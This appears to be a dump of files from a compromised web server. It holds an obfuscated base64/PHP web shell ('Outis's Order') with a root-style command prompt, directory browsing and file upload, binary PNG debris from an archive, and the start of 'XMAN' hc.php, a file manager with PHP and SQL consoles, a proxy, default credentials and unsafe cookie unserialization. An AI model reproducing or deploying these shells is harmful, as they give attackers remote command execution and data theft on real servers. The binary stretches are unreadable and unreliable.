o1cHg7anVzdGlmeS1jb250ZW50OmNlbnRlcn0ucGF0aCBhe2NvbG9yOiMwZjA7dGV4dC1kZWNvcmF0aW9uOm5vbmU7cGFkZGluZzozcHggNnB4O2JhY2tncm91bmQ6IzMzMztib3JkZXItcmFkaXVzOjNweH0udXBsb2FkLXNlY3Rpb257ZGlzcGxheTpmbGV4O2ZsZXgtZGlyZWN0aW9uOmNvbHVtbjthbGlnbi1pdGVtczpjZW50ZXI7Z2FwOjEwcHh9LnVwbG9hZC1idG57YmFja2dyb3VuZDojMGYwO2NvbG9yOiMwMDA7cGFkZGluZzo4cHg7Ym9yZGVyOm5vbmU7Y3Vyc29yOnBvaW50ZXI7Zm9udC1zaXplOjE0cHg7Ym9yZGVyLXJhZGl1czo1cHh9LmNvbW1hbmQtYm94e2Rpc3BsYXk6ZmxleDtqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyO2FsaWduLWl0ZW1zOmNlbnRlcjt3aWR0aDoxMDAlO2dhcDoxMHB4O2JhY2tncm91bmQ6IzIyMjtib3JkZXItcmFkaXVzOjVweDtwYWRkaW5nOjEwcHh9LmNvbW1hbmQtYm94IGlucHV0e2ZsZXgtZ3JvdzoxO2JhY2tncm91bmQ6IzExMTtjb2xvcjojMGYwO2JvcmRlcjoxcHggc29saWQgIzBmMDtwYWRkaW5nOjhweDtmb250LXNpemU6MTRweDtib3JkZXItcmFkaXVzOjVweH0uY29tbWFuZC1ib3ggYnV0dG9ue2JhY2tncm91bmQ6IzBmMDtjb2xvcjojMDAwO3BhZGRpbmc6OHB4O2JvcmRlcjpub25lO2N1cnNvcjpwb2ludGVyO2JvcmRlci1yYWRpdXM6NXB4O2ZvbnQtc2l6ZToxNHB4fS5kaXItbGlzdHtkaXNwbGF5OmZsZXg7ZmxleC1kaXJlY3Rpb246Y29sdW1uO2FsaWduLWl0ZW1zOmZsZXgtc3RhcnQ7b3ZlcmZsb3cteTphdXRvO21heC1oZWlnaHQ6MzAwcHh9LmRpci1saXN0IGF7Y29sb3I6IzBmMDtmb250LXdlaWdodDo3MDA7bWFyZ2luLWJvdHRvbTo1cHg7YmFja2dyb3VuZDojMzMzO3BhZGRpbmc6NXB4O2JvcmRlci1yYWRpdXM6M3B4O3RleHQtZGVjb3JhdGlvbjpub25lfS5kaXItbGlzdCBhOmhvdmVye2JhY2tncm91bmQ6IzQ0NH0uZGlyLWxpc3Qgc3Bhbntjb2xvcjojZmZmO21hcmdpbi1ib3R0b206NXB4fS5maWxlLWlucHV0LWNvbnRhaW5lcntkaXNwbGF5OmZsZXg7Z2FwOjEwcHg7YWxpZ24taXRlbXM6Y2VudGVyfXByZXt3aGl0ZS1zcGFjZTpwcmUtd3JhcDt3b3JkLXdyYXA6YnJlYWstd29yZDtiYWNrZ3JvdW5kOiMyMjI7cGFkZGluZzoxMHB4O2JvcmRlci1yYWRpdXM6NXB4fTwvc3R5bGU+PHNjcmlwdD5mdW5jdGlvbiBhZGRVcGxvYWRGaWVsZCgpIHsKICAgICAgICAgICAgbGV0IGNvbnRhaW5lciA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImRpdiIpOwogICAgICAgICAgICBjb250YWluZXIuY2xhc3NMaXN0LmFkZCgiZmlsZS1pbnB1dC1jb250YWluZXIiKTsKICAgICAgICAgICAgbGV0IGlucHV0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiaW5wdXQiKTsKICAgICAgICAgICAgaW5wdXQudHlwZSA9ICJmaWxlIjsKICAgICAgICAgICAgaW5wdXQubmFtZSA9ICJmaWxlW10iOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidXBsb2FkLWZvcm0iKS5pbnNlcnRCZWZvcmUoY29udGFpbmVyLCBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidXBsb2FkLWJ1dHRvbiIpKTsKICAgICAgICAgICAgY29udGFpbmVyLmFwcGVuZENoaWxkKGlucHV0KTsKICAgICAgICB9PC9zY3JpcHQ+PC9oZWFkPjxib2R5PjxoMT5PdXRpcydzIE9yZGVyPC9oMT48ZGl2IGNsYXNzPSJjb250YWluZXIgcGF0aCI+PD9waHAgIGdvdG8geXpmaEE7IGVpTk1VOiBmb3JlYWNoICgkZGlyQ29udGVudHMgYXMgJGl0ZW0pIHsgJGl0ZW1QYXRoID0gcmVhbHBhdGgoJGN1cnJlbnREaXIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJGl0ZW0pOyBpZiAoaXNfZGlyKCRpdGVtUGF0aCkpIHsgZWNobyAiXHgzY1x4NjFcNDBceDY4XDE2Mlx4NjVcMTQ2XDc1XDQyXDc3XDE2MFx4NjFcMTY0XHg2OFx4M2QiIC4gaHRtbHNwZWNpYWxjaGFycygkaXRlbVBhdGgpIC4gIlx4MjJceDNlXHg1Ylx4NDRcMTExXHg1MlwxMzVcNDAiIC4gaHRtbHNwZWNpYWxjaGFycygkaXRlbSkgLiAiXHgzY1x4MmZceDYxXHgzZSI7IH0gZWxzZSB7IGVjaG8gIlw3NFx4NzNceDcwXDE0MVx4NmVceDNlIiAuIGh0bWxzcGVjaWFsY2hhcnMoJGl0ZW0pIC4gIlx4M2NcNTdcMTYzXDE2MFwxNDFcMTU2XHgzZSI7IH0gfSBnb3RvIGFHTFg3OyBCZk9YcjogJG91dHB1dCA9ICcnOyBnb3RvIG1XWGxyOyBaQWRZczogJGRpcmVjdG9yaWVzID0gYXJyYXkoKTsgZ290byB1WUVaNTsgb2JTTnE6IGlmICghZW1wdHkoJG91dHB1dCkpIHsgPz4KPGRpdiBjbGFzcz0iY29udGFpbmVyIj48cHJlPjw/cGhwICBlY2hvIGh0bWxzcGVjaWFsY2hhcnMoJG91dHB1dCk7ID8+CjwvcHJlPjwvZGl2Pjw/cGhwICB9IGdvdG8gZVlUOXY7IGFhMTlKOiBmb3JlYWNoICgkZGlyQ29udGVudHMgYXMgJGl0ZW0pIHsgaWYgKCRpdGVtID09PSAiXHgyZSIpIHsgY29udGludWU7IH0gJGl0ZW1QYXRoID0gcmVhbHBhdGgoJGN1cnJlbnREaXIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJGl0ZW0pOyBpZiAoaXNfZGlyKCRpdGVtUGF0aCkpIHsgJGRpcmVjdG9yaWVzW10gPSAkaXRlbTsgfSBlbHNlIHsgJGZpbGVzW10gPSAkaXRlbTsgfSB9IGdvdG8gck9qbkw7IFRnUnBzOiAkY3VycmVudERpciA9IGlzc2V0KCRfR0VUWyJceDcwXHg2MVx4NzRceDY4Il0pID8gcmVhbHBhdGgoJF9HRVRbIlx4NzBceDYxXHg3NFx4NjgiXSkgOiBkaXJuYW1lKF9fRklMRV9fKTsgZ290byBIYUFtUTsgdVlFWjU6ICRmaWxlcyA9IGFycmF5KCk7IGdvdG8gYWExOUo7IHJPam5MOiBzb3J0KCRkaXJlY3Rvcmllcyk7IGdvdG8gckVRMXk7IE0yc2lLOiBpZiAoJF9TRVJWRVJbIlx4NTJceDQ1XDEyMVx4NTVcMTA1XHg1M1x4NTRceDVmXHg0ZFwxMDVcMTI0XDExMFx4NGZcMTA0Il0gPT09ICJceDUwXHg0Zlx4NTNcMTI0IiAmJiBpc3NldCgkX0ZJTEVTWyJceDY2XDE1MVx4NmNcMTQ1Il0pKSB7IGZvcmVhY2ggKCRfRklMRVNbIlwxNDZceDY5XHg2Y1x4NjUiXVsiXHg3NFwxNTVcMTYwXDEzN1wxNTZceDYxXDE1NVx4NjUiXSBhcyAka2V5ID0+ICR0bXBfbmFtZSkgeyAkdXBsb2FkRmlsZSA9ICRjdXJyZW50RGlyIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuIGJhc2VuYW1lKCRfRklMRVNbIlx4NjZcMTUxXHg2Y1wxNDUiXVsiXDE1Nlx4NjFcMTU1XHg2NSJdWyRrZXldKTsgbW92ZV91cGxvYWRlZF9maWxlKCR0bXBfbmFtZSwgJHVwbG9hZEZpbGUpOyB9IH0gZ290byBCZk9YcjsgckVRMXk6IHNvcnQoJGZpbGVzKTsgZ290byBVY2FxWDsgVWNhcVg6ICRkaXJDb250ZW50cyA9IGFycmF5X21lcmdlKCRkaXJlY3RvcmllcywgJGZpbGVzKTsgZ290byBNMnNpSzsgZ0lVVTQ6ICRjdXJyZW50UGF0aCA9ICcnOyBnb3RvIFFSVXNwOyBIYUFtUTogJGRpckNvbnRlbnRzID0gc2NhbmRpcigkY3VycmVudERpcik7IGdvdG8gWkFkWXM7IFFSVXNwOiBmb3JlYWNoICgkcGF0aFBhcnRzIGFzICRpbmRleCA9PiAkcGFydCkgeyBpZiAoJHBhcnQgIT09ICcnKSB7ICRjdXJyZW50UGF0aCAuPSAoJGluZGV4ID09IDAgPyAnJyA6IERJUkVDVE9SWV9TRVBBUkFUT1IpIC4gJHBhcnQ7IGVjaG8gIlx4M2NceDYxXDQwXHg2OFx4NzJceDY1XDE0Nlw3NVw0Mlw3N1x4NzBcMTQxXDE2NFx4NjhcNzUiIC4gaHRtbHNwZWNpYWxjaGFycygkY3VycmVudFBhdGgpIC4gIlw0Mlw3NiIgLiBodG1sc3BlY2lhbGNoYXJzKCRwYXJ0KSAuICJceDNjXHgyZlx4NjFcNzZcNTciOyB9IH0gZ290byBISDFMVDsgSEgxTFQ6ID8+CjwvZGl2PjxkaXYgY2xhc3M9ImNvbnRhaW5lciB1cGxvYWQtc2VjdGlvbiI+PGZvcm0gbWV0aG9kPSJwb3N0ImVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiaWQ9InVwbG9hZC1mb3JtIj48ZGl2IGNsYXNzPSJmaWxlLWlucHV0LWNvbnRhaW5lciI+PGlucHV0IG5hbWU9ImZpbGVbXSJ0eXBlPSJmaWxlIj4gPGJ1dHRvbiBjbGFzcz0idXBsb2FkLWJ0biJ0eXBlPSJidXR0b24ib25jbGljaz0iYWRkVXBsb2FkRmllbGQoKSI+KzwvYnV0dG9uPjwvZGl2PjxidXR0b24gY2xhc3M9InVwbG9hZC1idG4idHlwZT0ic3VibWl0ImlkPSJ1cGxvYWQtYnV0dG9uIj5VcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9kaXY+PGRpdiBjbGFzcz0iY29udGFpbmVyIGNvbW1hbmQtYm94Ij48Zm9ybSBtZXRob2Q9InBvc3Qic3R5bGU9ImRpc3BsYXk6ZmxleDt3aWR0aDoxMDAlO2dhcDoxMHB4O2p1c3RpZnktY29udGVudDpjZW50ZXI7YWxpZ24taXRlbXM6Y2VudGVyIj48bGFiZWwgc3R5bGU9ImNvbG9yOiMwZjAiPnJvb3RAb3V0aXM6fiQ8L2xhYmVsPiA8aW5wdXQgbmFtZT0iY29tbWFuZCJhdXRvZm9jdXMgcGxhY2Vob2xkZXI9IkVudGVyIGNvbW1hbmQuLi4icmVxdWlyZWQgc3R5bGU9ImZsZXgtZ3JvdzoxIj4gPGJ1dHRvbiBjbGFzcz0idXBsb2FkLWJ0biJ0eXBlPSJzdWJtaXQiPlJ1bjwvYnV0dG9uPjwvZm9ybT48L2Rpdj48P3BocCAgZ290byBvYlNOcTsgZVlUOXY6ID8+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+PGRpdiBjbGFzcz0iZGlyLWxpc3QiPjw/cGhwICBnb3RvIGVpTk1VOyBhR0xYNzogPz4KPC9kaXY+PC9kaXY+PC9ib2R5PjwvaHRt')); ?> PK R��Z�鷞 � 129451633favicon.pngnu �[��� �PNG IHDR > ��� pHYs �� sRGB ��� gAMA ���a 3IDATx�\]lT�>6�)����Z�<4��� �J�G� [��PP����D�QS�c���E^*RF�R�C��D� �cC�Ć�_�l�2���;3���n�~���ܹ��s�3g6'*@!��"k�����b��g1B�!����C��Q��S��=��G�5:Nw�<����L~^>7�*�5�JgSC��^"�t��>}Z^�����W�ZEǎ���*�T�dJ��O���R��c ���hKu>m���=H߷o]�|��f]t��!�Td��|r�\�+ �������(��.]JW�\�LEZ��'Lyk� i����*�YFGG������g:�i����u�O �@� Z�BZ���":u����d�%�����ίRb�m�'�}�ҁw'�A�<�z>$?� �nܣ�� � ���H!p����2i�I�n��W� ��\͋ ������a)�L���i����5�3si}��!�/�fS��\y�y"��G�w�O\���_�N`NN��=�=� ��/jػw��(l���y�իWcrxgee%mڴ�V�^��0� ��m�E�f����<��ҼI�m�P��t�mQ��s��� -��ύ.^�(�Ӂ�m�� 5�T�b�?!����݅�e��!^=Ӻ��:~�#V��Cd �<��Τ� �>!c�֠��:� ,�sY ���N��A�\��t�9\h�}��l��r�,���I�!G����%��K�('��������ǘi?\�vm����ؿ?�9sFZN$�&D*R�1��� ��������:`���u����q~ī1A1�ʩ1�[_��#����#wn� ݏ�����d{��ڮY�F*G*�~�K ��u-*֓����x�<w�sG�u>�k�_ލ����֫ol<n\"w�/������o��Ϭ��־���;_bҝ��N�^h<�}�Kg�+�� �N����Lނr'�o_��u�����?�|�0���aN� E�<p�� �=�^���Ąpd��p0kQ��͖깱7��i�Cw��� �8��x�ݷ/�e����Z�&���g_ �`�>LS |oV�1H8"\�E�w�f������9����!ς���|*]PJ�M��v����[�>X�ו�}|�©;{�>|��8��X4�tɰ���oNX�|"���}�@�T��XPn�E10DP���F{^�C6�Mbz�*��j�rظī�#x�.@@�A����www7+��u1 ��|�E.��j=�/���h�|;���g�ވ>��H;���|����nq���If��P�Adm��/�b|::O�""&� ba!l���6�=~9�(7nd;p������<�.��Ѫ�*�lYYYt��h��w�{5� �|��)�>�p���6�s����ļw�֭l��8�HL��1q%,�0�-!��KS2��ucR�(r!��v}wUVUƴoll�����/\�0�s��A����Ի�8X�u��zΥ�:\�ٔ<b}{n�ʶ����u{^���N. �qec�1�#� �c���)Y��q��Əhov�A��唛��I>�x��@}�f�N�-��&A�Ν;G7oތ�oٲe1 ъ+���Y�ͺ�c����-��xu�'(�.�<a���ea�V��r�@�@| 78p~�Z�|yܒ�� З�C}�,�:�O)�|�:��5��em���@d�k8 ���Uh�L>,s��/U̡?kCP�����ϭN�z�Q��}�øu��Ά b���r��Q�����)�g�Oon���t͕143�őiIIz�W8�艍G��`}k�;�|MA��={�,ݺu��9"�H�.� �"ݛt���h�W�]�t�p��M��$���0�k� =k�K�A�m�Ն��ڹsg��zWe��:hb8��c��\��^�\�>7M+�Z&L�i%dq4��eL����B�Q���֟��^�=�\p�]��CY\�,��->wi=�cڈ���Y�Mڠ�rߦ�{p�=��?LZ �18zA�8)pE7e��(�B�z�*����S��%M�M��6����(���ս�.0�k��]#�ζ_����Dm�� �W�K�� �n���4�sJ�п- �u��S-�ʄ����ȣ�.�Էݑ5\!��� �3�q���^�䉻&Zڊ��O0[da-݆�pm=�|���\@�j�3h�>��~���Y�� ���#D8����Vh�OMq�� �Ik!�~Y=/�5�����;�&X��lW�$��Kp7� 0�wOt�Qk�W��R�C��J��S1�m��d"B@��N K1���J>֗�e\��2c��к�P� � �k��� �sS�p��xIUǵ`� BR! ~Je��|��DH����nP��Pks��q���z��N�F�!��#K\�ll�p�! H�@��6��_V�p�T����8)v/�䫂`�Բ�ne���D5N �D�;P�w��� �P�TC���Í�{�uJ i�d��H>�,ē6��vR�bG�S!�֟Ҏ�̣l�Q�91~P3�(��`C&�_�ZW>����M��� �;|J�@ p�� ��w� �/ϔ��W� �AR��� `�:/�4O�@0�ǤOEf*��!)�#!��$�]���C�F�w�:�sl��g.�?Ȥ~]C�sa9H6y"=�1��"���,FH~#$?������b��g1B������~̄� IEND�B`�PK R��Z�Y�C C logo-dark.pngnu W+A�� �PNG IHDR � d Æ pHYs � ��+ �IDATx^�]�eWU=��^�_& dɨ��h@�@ QB4U1�$|!��cE��*�ȧ@0����BPD���*SVJK �L�I&��~��u����}���ڻ�̛��>��s����y���!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��� Q�2m�(v��yV�'�eH.G#M��(9�_���.Iz.M{nm�lt[�O��V�E�mH���Lt:��/#=�t��omAIb�d���q4I]��,�X�1��a��a�`J'e�Z7�t��$r�,�4k�)���V�*�ΉeU�W��k�<X�0J��h��ssw��9w =�O��rI��5`D�p邋���R�C����a�b�x@�R7�.q��n�U��DQɊ���r>���?H4�.��-G��(FD4Tw���24�մ���u��� ;V0�es*SI7����׳&��&Z�G���aZ;��ϣ�z<y���!���G��ӣ~�|�n����|�h��z;>��[g�[p����.��uPvZ�"*>_��1�ͣ$~�e.:�?�{�5�����|B���a/t��_��&��s��{�G��/Y�`���ܯ��t�(۹�'b���}6�p��yIxQ�9.A���5pw�y��v�����!m+D�sw$�ܝ;�97�n'{CME�p4|����K�8ih/��������d<�Y����/ ��r+���Ka�| ��,@�_˲��1� �]g���sO�C~۫{8��6�y�>\T�L`�n7H�p���8�]�4��]*���TB{/�j~<#����p�5�7�_��{j Op���J���݉�'��I]�Wk���Oy/��s-nT ��1��ϩ�ˑ>�V�cRe��ѵE����/C��Gz\�A��B�z�:�]�r�_7'K:wH^lW�q��UV[ߌI�No�r=Չd�O���L� �G`s8�� �4���*4��+o'��Fh�Q�A��J!.��F\i��?������2�%h��u PbN�m�f�S�8x���7��Od��9Z�^o �Vx��L�1[F��E�k1�w��u� ��$�+Ŷ��4DN��(�A�� ��uWl���S�9��F��Ǎ�� ��k��]����y��?>p/r�� ���7�K�f�pϢ�-\�i������Q��^�>��b��jv5��W�d�BoP�>��O�{�[/a�E�h�� ���r�����bURW�g@z'��SW�x��Kpo�Q�tѱ a�}-����xގ��\��C.A���dN��eJ�i��}�ا�]�/���$%M_��M@g�&��f|��f��Nw�<\�=z*���nkt���Ƨ/}�,�� ���ѩ0��S����O =u��C����H7��P�[��f�lvl�rNy҈�U�!�Ƌu��:0�N��˺a��c�IЗk�v}��Vts�;D&���QS��z7pf�������^hc��XI�d ��|���p��}�=��u��P�8�jA���V�s]}㎋E�z�b ,K��vz�5,��^,-�,9��d��Ώy]�пY�����-���s���A�L-X���"�{��ŶT�|~���9���V��"�a%Zb��]nY�A�Y�1l�N�F�i~�j�ʯ�(�ma�w*�H�$ ��-�8��ض�Ď#��8�� $�:��PeESl�.sG3�����kE�B7�5��Y8��G�� �G�V��ϳf��y~WJG�=��5�CZ���B�����B� M.w��ڝ�*F� -���o w6�珉�%r�ࡵs���2���1�ܠ��$��se��HD]��h�݇q1��9��1yt�#�j▖�h����z��5����͢�^����^��0�N���pKm9m��z%�,~�wEv����({����J��6D�����"�;؝���y:w̛��+��@�^ ��z�h��~;k����m�n�{�T-��݇E&�r�[�9g�S�������{�J|����צ�e�T�n�V4�z,�܀�`3>�8�k�~L�Ğ�:�ԉ��T�V����<�]��������b3�aSw��J�M��Pe9�Q~ ��=��O垁� G"���K�1��B�9��<~d�aD^��;��Ve�M}t����w���q;�����x��N/�5�?g]�M�h˦��f���Н�u�&J�7�w�R��OyG��4��g��D���'1Z�y le�CAwC.�|��xH�T���OM�kx�bgh:3���g!�ۼ�s�7���'�b�?���׀O���U8�J�yhȚX�C(�M`4���TسJD��;Ҕ1R��D��hI�4c��,z�7�!�ʒ`�T�Q�6��P5%k��0]����WtĄrĭb=�(��7j���.#�.4�'��W�z��I����0�CU2w�0�r^b����� QbUy�}9�8�~wl��vZ���Cn���u�ȹ�Ќ��� #�ڛ�p��x�0]�LC�{����M;�T��h�Չ�v����W:�$����D�M�T�Z��QaK���DOx�P$����+9�tA����@ɋy�8%�ꖝ�h�~\��"��>��`��y��>�]�'n���tXb�y��=M��}� ůc�ZJ� V��F!���AA��A��OW�!���g�ʜ��oGă�����v��#>���i�c#N�5����^ 1.�nF��q�i����������" Q v�d�G�e���}�Ъ����F�y�?��/z3ɱ!�I���r[�BOC��y����9�\�0�� xe��xk!c�ڜ\�9:�[�e�N$np��=�!�V0uYD�������^��F��&��Pa�t�)/�UEN��ޛ>绷���Jwlܴ�Qr� � qb����ڠ�˜젮٢�L�w!�Wo����c����=�9��!�I����%�/�b�*���4V�TX,+��Ixݎc��|qCr�b��L �aܯz�[(�MQ�����J:�L;v���{����9g�t��yTxB��>����~�B)z����)�k�K����'' �]�ss? �P��� q�h[P�W�J��ѳ�7e'B�W译'��i��u �2t?�ݢ�J�goj� �Y�ס��v��~�v�*%d�ొC�T��qHdm�̣ȏ!�~��Q�2��Æd.��ɽ��_���,��t�T�-�5Q��<Y�Ѵ��9o99�2ލ�bT�lI���*� =�~<*B+�o b�0�mQN�M��0H�i0+,��\V����U�vS;�ok�_�h|�X��Ϡ5#N��bq��b�~�ͺ��:k�l]���4��@�CJ6b�G1�p..C^�F� ����b��Aq��?Hl��bē���?�nq��%K��Eg�����'O�[�ș��]QNܷ�Ѻ��� �!�;��?c�+�1\���=��o<�,�J���������=`7 j@:#��t�{�$��@oٛ)I }��4���{_3:hx5js�݀�V>�sw����6sU� �3��^�,�Ӻ�«�>\ϼs�ka|r@d�~ g^�0jN��(��>�s_�����z��������xr��QW[�_���;�4��%�<��ƒ�@���Zq.���6^�Q��Jrx�"�}�d��r�Wa/|��V'Z�;�t��@� ��#(z�e��e�E�5;M�煇Y6*�/����+�ذ�t �q �)��\��F͑����m�Qc����{����&v��.�t�LUj�s?�gW?�k��p�h�P��]D�2���e��L�ŏ����jƠ�oG�p��6x ҧqe�6�k��l� �Oq�U����O��%�_�d@��_& ����ɯ*Lg=�@�;Yz��yх�F�E�7�,���i.������`�RƐ}��A>{�v�i��R�(u}�BO&�D�;�)����rI8�IM�%�ś�H2O|���~�\?]��.$��MO���Q�����͟�Py��8cd��ě��F��1�CykG�t�I��Ni|�Ͱ��aQ��!/��3�6ࡪv����{r�3�s�����Q6���)rOC#�I*�?or�Yp!�SH�E{7��b�}^�I:��_�EE���8�z��WiI6ҩ$�U�ۍ�y�=aU^����Ḧ����{�"9��b�Zl'߉��"n�<^��\�߂,5����9}ĵ ��:�7H=�>NJ3��5{~�Sa��z��ܱ�5���KU�!{�ʯC��ϝs.��a+�7�g���u��̱�����N�u˓���G������N�7�Du�t�Ӿ;��c�8O/5���P���<+������0a�^��tqᢻB�v*�/}����S"N�捤��,�U^+6z���zŸ�ф))W��`e���Hs!=�-~s�� �'G]�}�0��R��(�[���ٌ���B��~%��t�G�>��2��Az���o��J�b�!�K�}$5�o�ԇ�L�Tn�rq;/� �O[.�9��Lg%����h���y�3�o5߅��o��-�eҵU�2��a���VP��Y�]|>c���=È���Е;��'y1��5�F�����,�{�z�C�d�x}�b�P����s��<V�1�2��|��A|r�J�w��ej2���kY��ꎮ�ķ���G���x��XG�P�C�"��N�u��}߈3�>��V�֟ɯ*s��b�r��WH?��M8]��x��>�m�MؕuNje�?#��7&VS�Cqi %�h��z�o2������<�T���Ӧ{I�ܼc�.KΛI��^���CF���|���˻��Nu�����cP�����>X�Ϫ�H#�$��^*�i�s�Q�r!W��c���Y�.�<�ڻ��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`��!`���"�]�ז IEND�B`�PK R��Z�H�� � 304753542favicon.iconu W+A�� �PNG IHDR 2 2 ?�� pHYs � ��+ }IDATx^�MhA��UL�m�C BQ4 �� "9�� �����H�(��i���� �!�CO��C[ �&xQ����b�Ov:/u��M����)u`�}��ޛ������n��/"��Q���Q���ʁ,i��c���]kT�-�����6�]��3q�V[N&�6���"�b <�;+��u19����ǗA�lomm=lDH��U���f��q�/Vn� �u���X,���ǀ��(�A����D&''�K��v��]���?� &#�VJ${���l�H�/54#_.��)�Wo�m��B��x���U�y�P(pGGGƆ�������U����ޞ�������q�������G5�I�Zն "�<��tSSS���ٝj�����I�1{�X, cA����Q�(�G�PA�^�k&!���J���E&!j��z||�t4e�_YYy��G�&���dn�����]o��$}iQ������LB����K����R��a�d2������e�.-�`���x��Ɛ#t��ʆN�#�tZ�Oq쉉�6�H䙸F$����X��.��W����@ B7���[)?/�;;;�2�@���D288H�-&A���>a @f}}��Ea86c!��7&3Nѹ vND�Uoo/I�Rl. �2KKK���l�@X�VR.��l[G�X�9�F��d�YT��������;0�@� ��8�pN��Ж�&��L�w*4??�v) �N��G�������Z�Fu) ��y! P�^W9�N� ��4����+��j`:KJ.�3�V��!����N���}���]J�n�b��������P��`9#\k���x��Bg8��k�j�F��O�~t�Q IEND�B`�PK R��Z%M��. �. 254259543hc.phpnu �[��� <?pHp /* XMAN PHP ver 1.4*/ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.4; //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg 